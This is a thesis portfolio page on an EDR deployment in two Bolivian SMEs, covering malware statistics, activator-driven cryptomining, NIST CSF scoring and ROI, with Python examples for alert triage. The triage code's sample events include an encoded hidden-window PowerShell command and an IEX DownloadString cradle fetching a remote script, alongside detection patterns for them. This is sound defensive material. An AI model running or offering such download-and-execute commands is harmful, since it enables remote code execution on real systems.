Cyber Threat Analysis Using EDR Technology to Strengthen Information Security in Cochabamba SMEs
Paola C. Medrano Pizarrozo·Universidad Privada Domingo Savio·Network & Telecommunications Engineering·April – July 2024
Advisor: Lic. Vladimir Wilmar Rojas Condori
Original contribution
To my knowledge at the time of writing, there was no published empirical study documenting a real EDR deployment in Bolivian SMEs, nor primary threat intelligence data from this specific LATAM context. This work contributes:
1. A documented real-world EDR deployment across two operational SMEs, not a lab simulation, yielding original threat telemetry from 16 endpoints over 2 months.
2. The first NIST CSF 2.0 evaluation (106 subcategories) applied to micro-SMEs in Bolivia, establishing a reproducible baseline measurement methodology for this context.
3. Empirical evidence of the piracy → malware infection chain in resource-constrained environments: illegal software activators (KMSpico-type) as the dominant threat vector, accounting for the majority of trojan and cryptomining detections.
4. A practical security improvement algorithm designed specifically for SMEs with no prior security posture, bridging the gap between international standards (ISO/IEC 27001, NIST CSF, GDPR) and organizations that have no baseline to start from.
Research questions
RQ1
What are the most prevalent cyber threats in Bolivian SMEs, and what are their primary entry vectors?
Finding: Trojans dominate (60.94%) in both companies; the primary vector is illegal software activators, not phishing or external exploitation as commonly assumed.
RQ2
Can an EDR solution be successfully integrated into resource-constrained SMEs with existing legacy infrastructure?
Finding: Yes — deployment succeeded on all 16 accessible endpoints (x64, Windows 7–11), with three deployment methods adapted to constraints (USB, offline installer, email link).
RQ3
What security posture gaps exist in these SMEs, and how can they be addressed using international frameworks?
Finding: Both companies scored 1.5/4 on NIST CSF 2.0. Critical gaps: identity management, awareness training, incident response planning, and governance oversight.
RQ4
Is EDR investment economically justified for SMEs with revenues under 1M Bs/year?
Finding: ROI of 173–801% — economically viable even for micro-enterprises when ransomware risk, cryptomining energy theft, and remediation costs are factored in.
Technical & research skills applied
- EDR Deployment: Sangfor Endpoint Secure
- Threat Analysis: classification & triage
- Network Assessment: port scanning, topology
- NIST CSF 2.0: 106-subcategory evaluation
- ISO/IEC 27001: controls & governance
- Security Economics: ROI & cost-benefit
- MITRE ATT&CK: threat classification
- Field Research: interviews, observation
Overview
This is a field case study conducted as my final undergraduate thesis. Bolivian SMEs represent 44% of national GDP yet lack the resources and awareness to defend against modern cyber threats. I deployed Sangfor Endpoint Secure EDR on two real companies in Cochabamba, monitored their endpoints for two months, and applied the NIST CSF 2.0 framework to evaluate their security posture. Within these two companies I detected 234 malware instances, 2 APT-level indicators, and 632 suspicious PowerShell alerts — with trojans representing 60.94% of detections, primarily introduced through illegal software activators. I proposed a practical security improvement algorithm and demonstrated a positive ROI of 173–801% for EDR adoption at this scale.
Scope & Limitations
Sample size: Two companies — findings describe these specific environments. Statistical generalization requires a larger sample across sectors and regions.
Monitoring period: Two months (May–July 2024). Seasonal threat patterns and long-term persistence of APT threats cannot be assessed from this window.
NIST CSF scoring: Derived from CEO/user interviews + EDR logs + direct observation. Scoring 106 subcategories via qualitative data introduces subjectivity.
EDR coverage: Company B's personal devices were excluded (permission denied), so the threat picture for that environment is incomplete.
Bolivia's Cybersecurity Landscape
Bolivia ranks 140th out of 194 countries in the Global Cybersecurity Index — the worst performer in South America — yet SMEs drive 44% of GDP and 70% of private employment.
- 140th: Global Cybersecurity Index rank (194 countries)
- 60%+ of SMEs experienced a cyber incident in the past 2 years
- 84% of attack victims received no guidance or support afterwards
- 43% of the 137B cyberattacks recorded in LATAM in 2023 targeted SMEs
Figure: Cyber risk exposure indicators in Bolivia (%)
SME Environment Profiles
Understanding the technical environment is key to interpreting the threat findings. Both companies operate in Cochabamba's Cercado province with minimal IT governance.
Company A — Geotechnical Engineering
12 endpoints
~10 years in operation. Provides soil studies, terrain stability analysis, foundation engineering, and geotechnical risk evaluation for national construction and infrastructure projects.
OS: Windows 7 Ultimate / 10 Pro / 11 Home, most unpatched
⚠Received lawsuit from an international company for delivering services using pirated software (AutoCAD activators)
Company B — Telecommunications
4 endpoints
~5 years in operation. Designs, builds, and maintains telecom infrastructure: radio base stations, antenna installation, 5G SWAP upgrades, GPON fiber networks, and data centers. Expanding to Chile.
OS: Windows 7 Ultimate / 10 Pro / 11 Pro, all unpatched
Apps: Office suite only; Windows Security as sole protection
⚠Replaced server hardware believing it was physically broken — EDR later revealed it was silently running cryptomining malware
Flat network architecture — unrestricted lateral movement
Neither company implemented network segmentation. Every device sits on the same subnet with no VLAN, no firewall rules between workstations, and no VPN. A single compromised endpoint gives an attacker direct access to all devices on the network, including the file server.
Company A: PPPoE · Mikrotik · 192.168.0.0/24
Company B: TIGO ISP · TP-Link · 192.168.1.0/24 (DHCP)
Multiple admin accounts had weak or no passwords. No MFA implemented. Most endpoints connected to the internet without VPN or network segmentation.
Threat Intelligence Findings
The EDR monitored both companies from May 1 – July 1, 2024 (Company A) and May 7 – July 1, 2024 (Company B), detecting 234 malware instances, 2 APT-level threats, and 632 PowerShell alerts.
- 234 malware detections
- 2 APT-level indicators (MITRE ATT&CK T1071, T1105)
- 632 suspicious PowerShell alerts
Figure: Malware type distribution, Companies A & B
Why trojans dominate (60.94%)
The primary vector is illegal software activators (e.g. KMSpico) used to activate unlicensed Windows and professional tools such as AutoCAD. These activators bundle trojans whose processes traditional signature-based antivirus did not distinguish from legitimate ones; only the EDR's behavioral engines flagged them.
Most-affected endpoint: SERVER (every user account holds admin permissions on it)
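To make the triage behind these figures concrete, here is an added example (my own code, not Sangfor Endpoint Secure's export format nor the study's scripts) that takes a constructed batch of endpoint events, computes the malware family distribution, finds the most-affected host, tags events with MITRE ATT&CK technique IDs (T1204.002 for activator-delivered files, T1496 for miners, T1071.001 for browser-process beaconing, T1059.001/T1105/T1027/T1564.003 for PowerShell) and scores PowerShell command lines so that a pile of several hundred alerts can be ranked. The event schema, the activator name fragments and the indicator weights are assumptions to tune against real telemetry.

```python
import re
from collections import Counter

# Constructed sample events (illustrative; field names are an assumption, not Sangfor's schema).
EVENTS = [
    {"host": "SERVER", "kind": "malware", "family": "Trojan",
     "path": r"C:\Users\Public\KMSpico\AutoPico.exe"},
    {"host": "SERVER", "kind": "malware", "family": "Trojan",
     "path": r"C:\Program Files\KMSpico\KMSELDI.exe"},
    {"host": "PC-03", "kind": "malware", "family": "CoinMiner",
     "path": r"C:\ProgramData\svchost.exe"},
    {"host": "PC-07", "kind": "malware", "family": "Adware",
     "path": r"C:\Users\u\Downloads\setup.exe"},
    {"host": "DESKTOP-3VHFVU9", "kind": "network", "process": "chrome.exe",
     "dst": "203.0.113.7", "port": 443, "beacon_interval_s": 60},
    {"host": "DESKTOP-3VHFVU9", "kind": "powershell",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "PC-03", "kind": "powershell",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://198.51.100.9/a.ps1')\""},
    {"host": "PC-01", "kind": "powershell",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Activator-related name fragments: an illustrative starting list, tune to your EDR's reports.
ACTIVATOR_HINTS = ("kmspico", "autopico", "kmseldi", "autokms", "kmsauto")
MINER_FAMILIES = ("coinminer", "miner", "xmrig")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")

# PowerShell indicators: (regex, weight, ATT&CK technique or None). Weights are hypothetical.
PS_INDICATORS = [
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 4, "T1027"),  # base64 payload
    (r"-w(indowstyle)?\s+hidden", 2, "T1564.003"),                  # hidden window
    (r"-nop\b|-noprofile", 1, None),
    (r"executionpolicy\s+bypass", 2, None),
    (r"\biex\b|invoke-expression", 3, None),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3, "T1105"),
]


def score_powershell(cmdline):
    """Return (score, techniques) for one PowerShell command line."""
    score, techniques = 0, []
    for pattern, weight, technique in PS_INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            if technique:
                techniques.append(technique)
    if score:
        techniques.append("T1059.001")  # Command and Scripting Interpreter: PowerShell
    return score, techniques


def map_attack(event):
    """Map one event to ATT&CK technique IDs (empty list = nothing notable)."""
    kind = event["kind"]
    if kind == "malware":
        techniques = []
        if event["family"].lower() in MINER_FAMILIES:
            techniques.append("T1496")      # Resource Hijacking
        if any(h in event["path"].lower() for h in ACTIVATOR_HINTS):
            techniques.append("T1204.002")  # User Execution: Malicious File
        return techniques
    if kind == "network":
        # Periodic outbound traffic from a browser process: candidate C2 over web protocols.
        if event["process"].lower() in BROWSERS and event.get("beacon_interval_s"):
            return ["T1071.001"]
        return []
    if kind == "powershell":
        return score_powershell(event["cmdline"])[1]
    return []


def family_distribution(events):
    """Percentage of malware detections per family, rounded to 2 decimals."""
    counts = Counter(e["family"] for e in events if e["kind"] == "malware")
    total = sum(counts.values())
    return {fam: round(100 * n / total, 2) for fam, n in counts.items()}


def most_affected_host(events):
    """Host with the most malware detections."""
    return Counter(e["host"] for e in events if e["kind"] == "malware").most_common(1)[0][0]


def priority(event):
    """high / medium / low / info from the PowerShell score or the mapped techniques."""
    if event["kind"] == "powershell":
        s = score_powershell(event["cmdline"])[0]
        return "high" if s >= 6 else "medium" if s >= 3 else "low" if s else "info"
    t = map_attack(event)
    return "high" if "T1071.001" in t or "T1496" in t else "medium" if t else "low"


def triage(events):
    """Events as (priority, host, kind, techniques), sorted high -> info for analyst review."""
    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    rows = [(priority(e), e["host"], e["kind"], map_attack(e)) for e in events]
    return sorted(rows, key=lambda r: (order[r[0]], r[1]))


if __name__ == "__main__":
    print(family_distribution(EVENTS), "most affected:", most_affected_host(EVENTS))
    for row in triage(EVENTS):
        print(*row)
```

The scoring deliberately treats a plain `-File backup.ps1` invocation as informational: most of a 632-alert pile in an SME looks like that, and the point of the weights is to surface the encoded, hidden-window, download-and-execute lines first rather than to declare every PowerShell launch malicious.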
Advanced Persistent Threat (APT) Indicators — Company A only
DESKTOP-3VHFVU9 — HIGH
MITRE ATT&CK T1071 (Application Layer Protocol): malicious traffic embedded inside chrome.exe, blending with normal web traffic to evade network detection.
Before this study, Company B noticed severe server performance degradation. With no security monitoring in place, the IT team concluded the hardware was physically failing and replaced the entire server. The real culprit — cryptomining malware running silently in the background — was never identified and migrated to the new hardware. The EDR deployment finally revealed the truth: the machine was actively mining cryptocurrency for an unknown attacker.
Energy consumption, calculated from the study
- Extra power per infected endpoint (cryptomining GPU/CPU overhead): 300 W
- Daily operation (working hours): 8 h/day
- Annual operation (excluding holidays): 350 days
- Extra consumption per endpoint (300 W × 8 h × 350 d ÷ 1000): 840 kWh/yr
- Bolivia electricity cost (national average): 0.60 Bs/kWh
- Endpoints affected (Company A, confirmed by EDR logs): 2 PCs
- Annual electricity stolen (840 kWh × 0.60 Bs × 2 endpoints): 1,008 Bs, paid by the company, mined for the attacker
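The energy figure above is the only component of the ROI case that the page spells out; the following added example (mine, not the thesis's spreadsheet) reproduces it and then shows how it combines with an annualized loss expectancy for ransomware into an EDR ROI, with a sensitivity sweep over the assumed incident likelihood. The EDR licence cost, the remediation saving and the ransomware likelihoods are hypothetical placeholders; the ransomware loss is the midpoint of the ~16,000–18,000 Bs range quoted in the conclusions.

```python
def cryptomining_energy_cost(watts, hours_per_day, days_per_year, price_per_kwh, endpoints):
    """Return (kWh per year across all affected endpoints, cost in the price's currency)."""
    kwh = watts * hours_per_day * days_per_year / 1000 * endpoints
    return round(kwh, 2), round(kwh * price_per_kwh, 2)


def annualized_loss_expectancy(single_loss, annual_rate_of_occurrence):
    """ALE = SLE x ARO: expected yearly loss from one incident type."""
    return single_loss * annual_rate_of_occurrence


def edr_roi_pct(annual_edr_cost, avoided_losses):
    """ROI as a percentage: (sum of avoided losses - cost) / cost x 100."""
    if annual_edr_cost <= 0:
        raise ValueError("annual_edr_cost must be positive")
    return round((sum(avoided_losses) - annual_edr_cost) / annual_edr_cost * 100, 1)


def roi_sensitivity(annual_edr_cost, fixed_avoided, single_loss, aro_values):
    """ROI for each assumed ransomware likelihood, to see where the case turns negative."""
    return {aro: edr_roi_pct(annual_edr_cost,
                             fixed_avoided + [annualized_loss_expectancy(single_loss, aro)])
            for aro in aro_values}


if __name__ == "__main__":
    kwh, bs = cryptomining_energy_cost(300, 8, 350, 0.60, 2)  # inputs from the page
    print(f"{kwh} kWh/yr stolen = {bs} Bs/yr")
    edr_cost = 2400.0        # hypothetical yearly EDR cost for 16 endpoints
    remediation = 1200.0     # hypothetical yearly technician time no longer spent on reinstalls
    ransomware_sle = 17000.0 # midpoint of the ~16,000-18,000 Bs range on this page
    print(roi_sensitivity(edr_cost, [bs, remediation], ransomware_sle, [0.05, 0.1, 0.25, 0.5]))
```

With those placeholder inputs the ROI is positive even at a 5% yearly ransomware likelihood, which is the check a CEO will actually ask for: not the headline number, but how low the incident probability has to drop before the licence stops paying for itself.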
Performance impact on endpoints
→CPU/GPU maxed out: legitimate engineering software (AutoCAD, Civil 3D, ArcGIS) became unusable on affected workstations — users experienced constant freezing.
→Invisible to legacy AV: cryptomining processes disguise themselves as normal system activity — Windows Security and Panda did not trigger any alert.
→File corruption: Company A reported files being corrupted due to malicious activity. The origin was unknown until EDR behavioral analysis traced it.
The piracy → cryptomining infection chain
1. Download KMSpico / activator → 2. Bundled trojan installs silently → 3. Cryptominer runs in background → 4. CPU/GPU consumed, system slows → 5. IT replaces hardware (wrong diagnosis)
Both companies used software activators (KMSpico-type) to bypass licensing for Windows, AutoCAD, Civil 3D, and Office. These were the primary entry point for both trojans and cryptominers.
Figure: Incident frequency timeline (May – July 2024). The peak in early June was caused by software activator usage; detections drop after EDR containment measures.
Figure: Detections by Sangfor EDR engine. The Gene Analysis Engine caught the most threats; multiple engines working in parallel detected malware missed by traditional AV.
Security Posture: NIST CSF 2.0
106 subcategories across 6 NIST functions were evaluated (0–4 scale). Both companies scored 1.5/4, indicating cybersecurity risk management is not yet integrated into organizational practices.
Figure: NIST CSF score, current vs. 12-month target
Critical gap areas identified
- Identity Management & Access Control
- Cybersecurity Awareness & Training
- Continuous Security Monitoring
- Incident Response Planning
- Governance Oversight (GV.OV)
- Improvement (ID.IM)
The most critical insight: neither company has a security policy, incident response plan, or cybersecurity committee. Technology alone (EDR) is not sufficient — governance must improve in parallel.
A step-by-step security algorithm was proposed for SMEs that have no existing security strategy. Starting from the NIST CSF assessment, it guides organizations to reach a score of 4.0/4 within 12 months, aligned with ISO/IEC 27001 and GDPR.
Step 1: NIST CSF 2.0 Assessment. Evaluate the 106 subcategories across Govern, Identify, Protect, Detect, Respond, Recover.
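An added example (my own code, not the thesis's scoring sheet) of what Step 1 produces when the 0–4 scores are aggregated: per-function means, the overall score, the gap list that feeds the remaining steps, and a linear 12-month milestone line towards the 4.0 target. The twelve subcategory scores are constructed for illustration (the study scored all 106); the quarter-by-quarter sequencing of gaps is an assumed planning choice, and the overall score is the plain mean over subcategories, which may differ from how the study weighted them.

```python
import re
from collections import defaultdict

FUNCTIONS = {"GV": "Govern", "ID": "Identify", "PR": "Protect",
             "DE": "Detect", "RS": "Respond", "RC": "Recover"}
ID_PATTERN = re.compile(r"^(GV|ID|PR|DE|RS|RC)\.[A-Z]{2}-\d{2}$")

# Constructed scores on the 0-4 scale used on this page (illustrative, not study data).
SAMPLE = {
    "GV.OV-01": 1, "GV.OV-02": 0,
    "ID.AM-01": 2, "ID.IM-01": 1,
    "PR.AA-01": 1, "PR.AT-01": 0,
    "DE.CM-01": 3, "DE.AE-02": 2,
    "RS.MA-01": 1, "RS.CO-02": 1,
    "RC.RP-01": 2, "RC.CO-03": 1,
}


def validate(assessment):
    """Reject malformed subcategory IDs and scores outside the 0-4 integer scale."""
    for sub_id, score in assessment.items():
        if not ID_PATTERN.match(sub_id):
            raise ValueError(f"bad subcategory id: {sub_id}")
        if not isinstance(score, int) or not 0 <= score <= 4:
            raise ValueError(f"score out of range for {sub_id}: {score}")
    return True


def function_scores(assessment):
    """Mean score per CSF function (first two letters of the ID), rounded to 2 decimals."""
    validate(assessment)
    buckets = defaultdict(list)
    for sub_id, score in assessment.items():
        buckets[sub_id[:2]].append(score)
    return {f: round(sum(v) / len(v), 2) for f, v in buckets.items()}


def overall_score(assessment):
    """Mean over all subcategories, each weighted equally."""
    validate(assessment)
    return round(sum(assessment.values()) / len(assessment), 2)


def gaps(assessment, threshold=2):
    """Subcategories scoring below the threshold, worst first, then by ID."""
    validate(assessment)
    return sorted((s for s, v in assessment.items() if v < threshold),
                  key=lambda s: (assessment[s], s))


def quarter_plan(assessment, threshold=2, quarters=4):
    """Spread the gaps over the planning quarters, lowest scores in Q1."""
    ordered = gaps(assessment, threshold)
    per_quarter = -(-len(ordered) // quarters)  # ceiling division
    return {q + 1: ordered[q * per_quarter:(q + 1) * per_quarter] for q in range(quarters)}


def monthly_targets(current, target=4.0, months=12):
    """Linear overall-score milestones from the current score to the target."""
    step = (target - current) / months
    return [round(current + step * m, 2) for m in range(1, months + 1)]


if __name__ == "__main__":
    print("per function:", {FUNCTIONS[f]: s for f, s in function_scores(SAMPLE).items()})
    print("overall:", overall_score(SAMPLE))
    print("gaps:", gaps(SAMPLE))
    print("plan:", quarter_plan(SAMPLE))
    print("milestones:", monthly_targets(overall_score(SAMPLE)))
```

Validation matters more than it looks: when scores come from interview notes rather than a tool, a stray 5 or a mistyped ID silently shifts a function mean, and the gap list is what the rest of the improvement algorithm acts on.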
This study raises several questions that I consider worth investigating further — particularly relevant for security research in emerging economies and resource-constrained environments.
Empirical security measurement
How representative is the piracy → malware vector in LATAM SMEs at scale?
A longitudinal study across multiple countries and sectors would determine whether the piracy chain is a regional pattern or specific to Bolivia's licensing enforcement context.
Usable security
What is the minimum viable EDR configuration for SMEs with no dedicated IT staff?
This study applied enterprise-grade EDR configuration. Future work could optimize detection coverage vs. operational complexity tradeoffs for zero-IT-staff environments.
Security automation
Can behavioral EDR data be used to automate NIST CSF scoring?
Manually evaluating 106 NIST subcategories requires significant effort. EDR telemetry partially overlaps with several DETECT and RESPOND categories — automated scoring could make continuous evaluation viable.
Threat intelligence
What is the actual dwell time of cryptominers in unmonitored SMEs?
Company B replaced hardware without diagnosing the root cause. This suggests cryptominers may persist undetected for months or years — the actual prevalence and dwell time in this population is unknown.
Key Conclusions
EDR successfully integrated into both SMEs, detecting threats like cryptomining that were completely invisible to legacy antivirus — including incidents that had gone undetected for months.
60.94% of threats were trojans. Root cause: illegal KMSpico-style activators used to bypass Windows and AutoCAD licensing. This is a structural, cultural issue in Bolivian SMEs.
2 APT-level indicators were found in Company A (MITRE T1071, T1105), signaling active early-stage exploitation attempts that would have gone unnoticed without EDR behavioral analytics.
Both companies scored 1.5/4 on NIST CSF, with critical gaps in identity management, governance, and incident response. Technology alone is insufficient — governance must improve in parallel.
ROI of 173.2%–801.6% demonstrates that EDR investment is economically justified even for micro-enterprises, especially given the potential cost of a ransomware attack (~16,000–18,000 Bs).